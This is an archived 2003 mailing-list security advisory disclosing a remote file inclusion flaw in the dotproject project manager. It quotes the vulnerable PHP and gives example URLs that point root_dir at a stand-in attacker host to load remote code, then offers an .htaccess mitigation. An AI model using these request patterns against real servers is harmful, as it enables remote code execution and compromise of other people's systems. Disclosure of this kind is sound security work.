dotproject Remote Code Execution Vulnerability

From: mindwarperat_private
Date: Wed Jan 29 2003 - 04:02:24 PST

Next message: Martin Schulze: "[SECURITY] [DSA 246-1] New tomcat packages fix information exposure and cross site scripting"

Previous message: Fozzy [Hackademy Audit]: "[VulnWatch] MIT Kerberos FTP client remote shell commands execution"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

dotproject Remote Code Execution Vulnerability (By Mindwarper) 

<------- -------> 

---------------------- 
Vendor Information: 
---------------------- 

Homepage : http://www.dotproject.net 
Vendor : informed 
Mailed advisory: 28/01/03 
Vender Response : None 


---------------------- 
Affected Versions: 
---------------------- 

dev20030121 


---------------------- 
Vulnerability: 
---------------------- 


dotproject is a PHP+MySQL beta level web based project management and tracking tool 
that dotmarketing started in Dec. 2000. 
Inside the directory /modules/ multiple files try to include classdefs/date.php 
without defining $root_dir first and allow remote attackers to inject their own 
servers if globals are set on. 

Example Code from modules/projects/addedit.php: 

****** 

<?php 
## 
## Files modules: index page re-usable sub-table 
## 

require_once( "$root_dir/classdefs/date.php" ); 
$df = $AppUI->getPref('SHDATEFORMAT'); 
$tf = $AppUI->getPref('TIMEFORMAT'); 

****** 

As you can see nothing happens before the require_once function is called and therefore 
with globals set on an attacker may include remote files. 

Example: 

http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker 

this works also on 

http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker 
http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker 
http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker 
http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker 
http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker 


---------------------- 
Solution: 
---------------------- 

Please check the vendor's website for new patches. 

As a temporary solution, create a .htaccess file that contains 'Deny from all'. 
Place it in the /modules/ directory and that should block remote users from accessing it. 


---------------------- 
Contact: 
---------------------- 

Name: Mindwarper 
Email: mindwarperat_private 
Website: http://mindlock.bestweb.net 


<------- -------> 




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Next message: Martin Schulze: "[SECURITY] [DSA 246-1] New tomcat packages fix information exposure and cross site scripting"
Previous message: Fozzy [Hackademy Audit]: "[VulnWatch] MIT Kerberos FTP client remote shell commands execution"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jan 29 2003 - 05:50:06 PST